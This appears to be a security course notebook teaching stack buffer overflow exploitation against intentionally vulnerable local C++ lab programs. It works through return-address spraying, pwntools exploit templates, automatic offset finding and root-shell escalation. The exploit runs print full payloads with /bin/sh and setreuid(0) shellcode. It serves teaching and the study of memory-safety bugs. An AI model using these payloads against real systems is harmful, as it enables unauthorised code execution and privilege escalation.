# Attacks with Unknown Buffer Size

- so far we've utilized the buffer address and length to create payload
- this is not true in real-world where the attacker will not have access to the source code and binary of the vulnerable program to exploit
- we can try every possible lenght between 100-300, however, not recommended as it may trigger IDS and IPS
- let's pretend we only know the range; say 100-200 for the vulnerable program below
- we'll create the payload of the following structure:

```
| RT ... ... (4*53 = 212 bytes) | NOP .... 50 bytes | Shellcode |
```

- instead of sparying the return address towards the end of the payload, we spary them in the beginning
- we spray controlled return address (RT) at least 53 times so that at least one of them would overwrite the actual return address of the caller
    - hence the name **spraying** attack
- we'll exploit `bad.cpp` program in `demos/stack_overflow` folder
- we're using `EBP + 20` as the return address

In [18]:
! cat ./demos/stack_overflow/bad.cpp

#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
#include <iostream>
using namespace std;

#define BUFSIZE 128

using namespace std;


char * mgets(char *dst) {
    char *ptr = dst;
    int ch; 
	/* skip leading white spaces */ 
    while ((ch = getchar()) && (ch == ' ' or ch == '\t') )
        ; 

    if ((ch == '\n') or (ch == EOF)) { 
        *ptr = '\0';
        return dst; 
    } 
    else
        *ptr = ch;

    /* now read the rest until \n or EOF */ 
    while (true) {
        ch = getchar();
        if (ch == '\n' or ch == EOF) break;
        *(++ptr) = ch; 
    }
    *(++ptr) = 0;
    return dst;
}

void bad() {
    char buffer[BUFSIZE];
    cout << "Give me some text: ";
    fflush(stdout);
    mgets(buffer); // similar to C's gets;
    //gets(buffer); // depricated
    cout << "Acknowledged: " << buffer << " with length " << strlen(buffer) << endl;
}

int main(int argc, char *argv[]) {
    bad();
    cout << "Good bye!\n"

In [27]:
%%bash
input="demos/stack_overflow/bad.cpp"
output="demos/stack_overflow/bad.exe"
echo kali | sudo -S ./compile.sh $input $output
ls -al $output

-rwxr-xr-x 1 root root 31628 Apr 24 10:50 demos/stack_overflow/bad.exe


[sudo] password for kali: 

In [26]:
%cd ../../

/home/kali/SoftwareSecurity


In [28]:
%cd demos/stack_overflow

/home/kali/SoftwareSecurity/demos/stack_overflow


In [29]:
! python -c 'print("Hello World")' | ./bad.exe

buffer is at 0xffffbc30
Give me some text: Acknowledged: Hello World with length 11
Good bye!


In [24]:
! python -c 'print("A"*200)' | ./so_stdio.exe

Give me some text: Acknowledged: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA with length 200


## Create and Send Payload using Python and Pwntools

- `bad_exploit_spray.py` exploit code found in `demos/stack_overflow` demonstrates the attack

In [32]:
! pwd

/home/kali/SoftwareSecurity/demos/stack_overflow


In [31]:
! cat bad_exploit_spray.py

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# This exploit template was generated via:
# $ pwn template ./bad.exe
from pwn import *

# Set up pwntools for the correct architecture
target_program = './bad.exe'
exe = context.binary = ELF(target_program)

# Many built-in settings can be controlled on the command-line and show up
# in "args".  For example, to dump all data sent/received, and disable ASLR
# for all created processes...
# ./exploit.py DEBUG NOASLR

def start(argv=[], *a, **kw):
    '''Start the exploit against the target.'''
    if args.GDB:
        return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
    else:
        return process([exe.path] + argv, *a, **kw)

# Specify your GDB script here for debugging
# GDB will be launched if the exploit is run via e.g.
# ./exploit.py GDB
gdbscript = '''
tbreak main
continue
'''.format(**locals())

#===========================================================
#                    EXPLOIT GOES HERE
#=====================

- next is to just run the `bad_exploit_spray.py` from Terminal
- we'll get a shell!

```bash
(base) ┌──(kali㉿kali)-[~/SoftwareSecurity/demos/stack_overflow]
└─$ python bad_exploit_spray.py
[*] '/home/kali/SoftwareSecurity/demos/stack_overflow/bad.exe'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX unknown - GNU_STACK missing
    PIE:      No PIE (0x8048000)
    Stack:    Executable
    RWX:      Has RWX segments
[+] Starting local process '/home/kali/SoftwareSecurity/demos/stack_overflow/bad.exe': pid 123446
[*] Process '/home/kali/SoftwareSecurity/demos/stack_overflow/bad.exe' stopped with exit code -11 (SIGSEGV) (pid 123446)
[+] Parsing corefile...: Done
[*] '/home/kali/SoftwareSecurity/demos/stack_overflow/core.123446'
    Arch:      i386-32-little
    EIP:       0x6261616b
    ESP:       0xffffbd90
    Exe:       '/home/kali/SoftwareSecurity/demos/stack_overflow/bad.exe' (0x8048000)
    Fault:     0x6261616b
[+] Starting local process '/home/kali/SoftwareSecurity/demos/stack_overflow/bad.exe': pid 123457
[*] Switching to interactive mode
buffer is at 0xffffbd00
Give me some text: Acknowledged: \xf4\xbd\xff\xff\xf4\xbd\xff\xff\xf4\xbd\xff\xff\xf4\xbd\xff\xff\xf4\xbd\xff\xff\xf4\xbd\xff\xff\xf4\xbd\xff\xff\xf4\xbd\xff\xff\xf4\xbd\xff\xff\xf4\xbd\xff\xff\xf4\xbd\xff\xff\xf4\xbd\xff\xff\xf4\xbd\xff\xff\xf4\xbd\xff\xff\xf4\xbd\xff\xff\xf4\xbd\xff\xff\xf4\xbd\xff\xff\xf4\xbd\xff\xff\xf4\xbd\xff\xff\xf4\xbd\xff\xff\xf4\xbd\xff\xff\xf4\xbd\xff\xff\xf4\xbd\xff\xff\xf4\xbd\xff\xff\xf4\xbd\xff\xff\xf4\xbd\xff\xff\xf4\xbd\xff\xff\xf4\xbd\xff\xff\xf4\xbd\xff\xff\xf4\xbd\xff\xff\xf4\xbd\xff\xff\xf4\xbd\xff\xff\xf4\xbd\xff\xff\xf4\xbd\xff\xff\xf4\xbd\xff\xff\xf4\xbd\xff\xff\xf4\xbd\xff\xff\xf4\xbd\xff\xff\xf4\xbd\xff\xff\xf4\xbd\xff\xff\xf4\xbd\xff\xff\xf4\xbd\xff\xff\xf4\xbd\xff\xff\xf4\xbd\xff\xff\xf4\xbd\xff\xff\xf4\xbd\xff\xff\xf4\xbd\xff\xff\xf4\xbd\xff\xff\xf4\xbd\xff\xff\xf4\xbd\xff\xff\xf4\xbd\xff\xff\xf4\xbd\xff\xff\xf4\xbd\xff\xff\xf4\xbd\xff\xff\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x901\xc0Ph//shh/bin\x89\xe31\xc9\x89\xcaj\x0bX with length 340
$ whoami
kali
$ ls
auth_overflow_env.cpp  core.59097
authenticate.cpp       core.59796
...
```

## Automatically determining buffer address

- in real world, buffer address will not be printed!
- one can determine the buffer address using ESP
- PEDA provides offset for ESP which is the payload length to completely overwrite EIP or return address
- the offset to ESP can be automatically determined using pwntools's `cylic_find` API
- let's look at the modified program where the line printing the buffer address is commented out
- also the BUFSIZE is changed to 200

In [7]:
! cat demos/stack_overflow/so_stdio_no_add.cpp

#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
#include <iostream>
using namespace std;

#define BUFSIZE 200

using namespace std;

void give_shell(){
    // Set the gid to the effective gid
    // this prevents /bin/sh from dropping the privileges
    gid_t gid = getegid();
    setresgid(gid, gid, gid);
    system("/bin/sh");
}

char * mgets(char *dst) {
    char *ptr = dst;
    int ch; 
	/* skip leading white spaces */ 
    while ((ch = getchar()) && (ch == ' ' or ch == '\t') )
        ; 

    if ((ch == '\n') or (ch == EOF)) { 
        *ptr = '\0';
        return dst; 
    } 
    else
        *ptr = ch;

    /* now read the rest until \n or EOF */ 
    while (true) {
        ch = getchar();
        if (ch == '\n' or ch == EOF) break;
        *(++ptr) = ch; 
    }
    *(++ptr) = 0;
    return dst;
}

void bad() {
    char buffer[BUFSIZE];
    //printf("buffer is at %p\n", buffer);
    cout << "Give me some text: ";
    fflush(std

### Compile the program

In [8]:
%%bash
# compile the target program
input="./demos/stack_overflow/so_stdio_no_add.cpp"
output="./demos/stack_overflow/so_stdio_no_add.exe"
echo kali | sudo -S ./compile.sh $input $output

[sudo] password for kali: 

## Generate and run the exploit code

In [9]:
! cat ./demos/stack_overflow/so_stdio_no_add_exploit.py

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# This exploit template was generated via:
# $ pwn template ./so_stdio.exe
from pwn import *

# Set up pwntools for the correct architecture
target_program = './so_stdio_no_add.exe'
exe = context.binary = ELF(target_program)

# Many built-in settings can be controlled on the command-line and show up
# in "args".  For example, to dump all data sent/received, and disable ASLR
# for all created processes...
# ./exploit.py DEBUG NOASLR

def start(argv=[], *a, **kw):
    '''Start the exploit against the target.'''
    if args.GDB:
        return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
    else:
        return process([exe.path] + argv, *a, **kw)

# Specify your GDB script here for debugging
# GDB will be launched if the exploit is run via e.g.
# ./exploit.py GDB
gdbscript = '''
tbreak main
continue
'''.format(**locals())

#===========================================================
#                    EXPLOIT GOES HERE
#====

- execute the exploitcode from a terminal and get the shell!

```bash
──(kali㉿K)-[~/Sp22/SystemSecurity/demos/stack_overflow]
└─$ python so_stdio_no_add_exploit.py
[*] '/home/kali/Sp22/SystemSecurity/demos/stack_overflow/so_stdio_no_add.exe'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments
[+] Starting local process '/home/kali/Sp22/SystemSecurity/demos/stack_overflow/so_stdio_no_add.exe': pid 739836
[*] Process '/home/kali/Sp22/SystemSecurity/demos/stack_overflow/so_stdio_no_add.exe' stopped with exit code -11 (SIGSEGV) (pid 739836)
[+] Parsing corefile...: Done
[*] '/home/kali/Sp22/SystemSecurity/demos/stack_overflow/core.739836'
    Arch:      i386-32-little
    EIP:       0x63616164
    ESP:       0xffffc280
    Exe:       '/home/kali/Sp22/SystemSecurity/demos/stack_overflow/so_stdio_no_add.exe' (0x8048000)
    Fault:     0x63616164
payload_len = 216
ESP is at ffffc280
EIP contains 63616164
[+] Starting local process '/home/kali/Sp22/SystemSecurity/demos/stack_overflow/so_stdio_no_add.exe': pid 739839
buffer address is at: ffffc1a8
[*] Switching to interactive mode
Give me some text: Acknowledged: \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x901\xc0Ph//shh/bin\x89\xe31\xc9\x89\xcaj\x0b\xa8\xc1\xff\xff\xa8\xc1\xff\xff\xa8\xc1\xff\xff\xa8\xc1\xff\xff\xa8\xc1\xff\xff with length 216
$ whoami
kali
$ exit
[*] Got EOF while reading in interactive
$ 
```

## Getting root shellcode

- user shellcode gives your root shell if you create a soft link /bin/sh pointing to /bin/zsh
- use the root shellcode provided in the shellcode folder
- can also create setuid binary using pwntools and prepend it to the regular user shell
- make sure target program is root owned 
- set seteuid of the target program
- generate setuid binary using pwntools's shellcraft
- prepend the bytes generated to the user root shell

```bash
(base) ┌──(kali㉿kali)-[~/Sp23/SoftwareSecurity/demos/stack_overflow]
└─$ shellcraft -f d i386.linux.setreuid 0
\x31\xdb\x6a\x46\x58\x89\xd9\xcd\x80
```
- change the core pattern to make sure core.%p is the pattern

```bash
echo kali | sudo -S sysctl -w kernel.core_pattern=core.%p
```
- set ulimit to unlimited


### coredump of setuid programs
- must run the exploit_code with sudo to read the coredump of setuid programs

- run the exploit code as root

```bash
sudo python so_stdio_no_add_exploit.py
```

## Challenge

1. Create Python exploit code to get a root shell (instead of the user shell)
    - Hint - create a template similar to the demo
    - automatically find the controlled return address
    - test to make sure the exploit code works
